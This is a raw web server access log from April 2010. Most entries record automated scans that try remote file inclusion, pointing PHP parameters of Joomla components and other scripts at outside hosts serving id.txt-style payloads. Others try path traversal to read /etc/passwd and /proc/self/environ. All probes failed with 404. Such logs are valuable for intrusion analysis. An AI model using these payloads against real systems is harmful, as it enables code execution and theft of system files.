72.9.156.236 - - [25/Apr/2010:06:53:28 -0500] "GET /logs//mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:53:28 -0500] "GET /logs/access_log.1212969600%20%20//mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:55:12 -0500] "GET //manager/admin/u_ins.php?MGR=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:55:12 -0500] "GET /logs//manager/admin/u_ins.php?MGR=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:55:12 -0500] "GET /logs/access_log.1263772800//manager/admin/u_ins.php?MGR=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
213.251.175.42 - - [25/Apr/2010:06:55:45 -0500] "GET /logs//nullpo/hsList.php?subdir=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.803"
213.251.175.42 - - [25/Apr/2010:06:55:45 -0500] "GET //nullpo/hsList.php?subdir=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.803"
72.9.156.236 - - [25/Apr/2010:06:57:34 -0500] "GET /logs/access_log.1212969600//mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
207.46.204.185 - - [25/Apr/2010:06:59:54 -0500] "GET /logs/access_log.1260489600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.123.79.74 - - [25/Apr/2010:07:02:07 -0500] "GET /logs/access_log.1267920000//modules/documents/tree.documents.php?GLOBALS[where_framework]=http://www.visitbrooklyn.org//images/home/tmp/id2.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.123.79.74 - - [25/Apr/2010:07:02:07 -0500] "GET //modules/documents/tree.documents.php?GLOBALS[where_framework]=http://www.visitbrooklyn.org//images/home/tmp/id2.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.123.79.74 - - [25/Apr/2010:07:02:07 -0500] "GET /logs//modules/documents/tree.documents.php?GLOBALS[where_framework]=http://www.visitbrooklyn.org//images/home/tmp/id2.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.204.182 - - [25/Apr/2010:07:03:24 -0500] "GET /logs/access_log.1255996800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.52.203.55 - - [25/Apr/2010:07:04:40 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
195.216.234.1 - - [25/Apr/2010:07:04:47 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
204.14.3.162 - - [25/Apr/2010:07:04:47 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
118.217.216.132 - - [25/Apr/2010:07:04:47 -0500] "GET /logs/access_log.1220054400%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:07:04:47 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:07:04:49 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
69.57.164.32 - - [25/Apr/2010:07:04:58 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.217.216.132 - - [25/Apr/2010:07:05:04 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:07:05:05 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:07:05:06 -0500] "GET /logs/access_log.1220054400%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
208.116.11.84 - - [25/Apr/2010:07:05:24 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 333 "-""libwww-perl/5.834"
208.116.11.84 - - [25/Apr/2010:07:05:24 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.834"
77.92.94.85 - - [25/Apr/2010:07:06:33 -0500] "GET /logs/access_log.1265068800/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://77.92.94.85/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:07:06:33 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://77.92.94.85/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:07:06:33 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://77.92.94.85/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:07:06:34 -0500] "GET /logs/access_log.1265760000/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://77.92.94.85/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:07:06:42 -0500] "GET /logs/access_log.1265760000/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://77.92.94.85/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:07:06:42 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://77.92.94.85/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:07:06:42 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://77.92.94.85/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.205.74.152 - - [25/Apr/2010:07:07:36 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 333 "-""libwww-perl/5.805"
67.205.74.152 - - [25/Apr/2010:07:07:36 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.805"
77.92.94.85 - - [25/Apr/2010:07:08:03 -0500] "GET //components/com_moodle/moodle.php?=http://77.92.94.85/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:07:08:03 -0500] "GET /logs//components/com_moodle/moodle.php?=http://77.92.94.85/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:07:08:03 -0500] "GET /logs/access_log.1262649600//components/com_moodle/moodle.php?=http://77.92.94.85/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.216.234.1 - - [25/Apr/2010:07:08:04 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
195.216.234.1 - - [25/Apr/2010:07:08:04 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
195.216.234.1 - - [25/Apr/2010:07:08:04 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
204.14.3.162 - - [25/Apr/2010:07:08:38 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
204.14.3.162 - - [25/Apr/2010:07:08:38 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
204.14.3.162 - - [25/Apr/2010:07:08:39 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
77.92.94.85 - - [25/Apr/2010:07:09:32 -0500] "GET //administrator/components/com_rssreader/admin.rssreader.php?=http://77.92.94.85/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:07:09:32 -0500] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?=http://77.92.94.85/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:07:09:32 -0500] "GET /logs/access_log.1264982400//administrator/components/com_rssreader/admin.rssreader.php?=http://77.92.94.85/id.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:07:09:32 -0500] "GET /logs/access_log.1265673600//administrator/components/com_rssreader/admin.rssreader.php?=http://77.92.94.85/id.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
72.52.203.55 - - [25/Apr/2010:07:09:37 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
72.52.203.55 - - [25/Apr/2010:07:09:37 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
72.52.203.55 - - [25/Apr/2010:07:09:37 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
69.57.164.32 - - [25/Apr/2010:07:10:12 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
69.57.164.32 - - [25/Apr/2010:07:10:12 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
69.57.164.32 - - [25/Apr/2010:07:10:12 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
204.14.3.162 - - [25/Apr/2010:07:11:32 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
204.14.3.162 - - [25/Apr/2010:07:11:32 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
204.14.3.162 - - [25/Apr/2010:07:11:33 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
72.52.203.55 - - [25/Apr/2010:07:12:29 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
72.52.203.55 - - [25/Apr/2010:07:12:30 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
72.52.203.55 - - [25/Apr/2010:07:12:30 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
211.203.180.144 - - [25/Apr/2010:07:13:29 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 333 "-""libwww-perl/5.79"
211.203.180.144 - - [25/Apr/2010:07:13:29 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.79"
195.216.234.1 - - [25/Apr/2010:07:14:16 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
195.216.234.1 - - [25/Apr/2010:07:14:17 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
195.216.234.1 - - [25/Apr/2010:07:14:17 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
69.57.164.32 - - [25/Apr/2010:07:14:42 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
69.57.164.32 - - [25/Apr/2010:07:14:42 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
69.57.164.32 - - [25/Apr/2010:07:14:42 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
67.195.112.180 - - [25/Apr/2010:07:15:23 -0500] "GET /logs/access_log.1172016000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
78.110.50.121 - - [25/Apr/2010:07:16:22 -0500] "GET //includes/adminAvatars.php?GlobalSettings[templatesDirectory]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.110.50.121 - - [25/Apr/2010:07:16:22 -0500] "GET /logs//includes/adminAvatars.php?GlobalSettings[templatesDirectory]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.110.50.121 - - [25/Apr/2010:07:16:22 -0500] "GET /logs/access_log.1225238400//includes/adminAvatars.php?GlobalSettings[templatesDirectory]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
78.110.50.121 - - [25/Apr/2010:07:16:22 -0500] "GET /logs/access_log.1262822400//includes/adminAvatars.php?GlobalSettings[templatesDirectory]=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:17:35 -0500] "GET /logs/access_log.1264636800//zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:17:35 -0500] "GET /logs/access_log.1263168000//zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:17:35 -0500] "GET //zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:17:35 -0500] "GET /logs//zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:17:35 -0500] "GET /logs//zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:17:35 -0500] "GET //zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:17:35 -0500] "GET /logs/access_log.1263168000//zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:17:38 -0500] "GET /logs/access_log.1264636800//zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:19:06 -0500] "GET //zipndownload.php?PP_PATH=http://favoris.web2team.net/id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:19:06 -0500] "GET /logs//zipndownload.php?PP_PATH=http://favoris.web2team.net/id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:20:16 -0500] "GET /logs/access_log.1263168000//zipndownload.php?PP_PATH=http://favoris.web2team.net/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:20:16 -0500] "GET /logs/access_log.1264636800//zipndownload.php?PP_PATH=http://favoris.web2team.net/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:20:17 -0500] "GET //zipndownload.php?PP_PATH=http://favoris.web2team.net/id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:20:17 -0500] "GET /logs//zipndownload.php?PP_PATH=http://favoris.web2team.net/id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:20:36 -0500] "GET /logs/access_log.1263168000//zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:20:36 -0500] "GET /logs//zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:20:36 -0500] "GET //zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:20:40 -0500] "GET /logs/access_log.1264636800//zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:20:40 -0500] "GET /logs/access_log.1263168000//zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:20:40 -0500] "GET /logs//zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:20:43 -0500] "GET //zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:20:43 -0500] "GET /logs/access_log.1264636800//zipndownload.php?PP_PATH=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.46.13.135 - - [25/Apr/2010:07:21:25 -0500] "GET /logs/access_log.1262304000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.165.81.34 - - [25/Apr/2010:07:23:08 -0500] "GET //zipndownload.php?PP_PATH=http://favoris.web2team.net/id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:23:08 -0500] "GET /logs//zipndownload.php?PP_PATH=http://favoris.web2team.net/id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:23:08 -0500] "GET /logs/access_log.1263168000//zipndownload.php?PP_PATH=http://favoris.web2team.net/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:23:08 -0500] "GET /logs/access_log.1264636800//zipndownload.php?PP_PATH=http://favoris.web2team.net/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:23:17 -0500] "GET //zipndownload.php?PP_PATH=http://favoris.web2team.net/id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:23:18 -0500] "GET /logs//zipndownload.php?PP_PATH=http://favoris.web2team.net/id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:23:19 -0500] "GET /logs/access_log.1251504000//zipndownload.php?PP_PATH=http://favoris.web2team.net/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
202.131.93.10 - - [25/Apr/2010:07:23:54 -0500] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
202.131.93.10 - - [25/Apr/2010:07:23:54 -0500] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
202.131.93.10 - - [25/Apr/2010:07:23:54 -0500] "GET /logs/access_log.1219708800%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
87.106.42.197 - - [25/Apr/2010:07:28:31 -0500] "GET /logs/access_log.1224028800/index.php?option=com_acctexp&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.106.42.197 - - [25/Apr/2010:07:28:32 -0500] "GET /index.php?option=com_acctexp&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.106.42.197 - - [25/Apr/2010:07:28:32 -0500] "GET /logs/index.php?option=com_acctexp&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
88.165.81.34 - - [25/Apr/2010:07:28:55 -0500] "GET /logs//zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:28:56 -0500] "GET /logs/access_log.1251504000//zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:29:04 -0500] "GET //zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:29:06 -0500] "GET /logs/access_log.1251504000//zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:29:07 -0500] "GET /logs//zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
212.94.64.154 - - [25/Apr/2010:07:29:21 -0500] "GET /logs/access_log.1265414400//admin/auth.php?xcart_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
212.94.64.154 - - [25/Apr/2010:07:29:21 -0500] "GET /logs//admin/auth.php?xcart_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
212.94.64.154 - - [25/Apr/2010:07:29:21 -0500] "GET //admin/auth.php?xcart_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.252.224.4 - - [25/Apr/2010:07:29:31 -0500] "GET /logs/access_log.1262995200//admin/auth.php?xcart_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.252.224.4 - - [25/Apr/2010:07:29:31 -0500] "GET //admin/auth.php?xcart_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.252.224.4 - - [25/Apr/2010:07:29:31 -0500] "GET /logs//admin/auth.php?xcart_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
66.252.224.4 - - [25/Apr/2010:07:29:31 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:29:35 -0500] "GET /logs/access_log.1264896000//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:29:35 -0500] "GET //addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:29:35 -0500] "GET /logs/access_log.1264550400//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:29:35 -0500] "GET /logs//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:29:36 -0500] "GET //zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
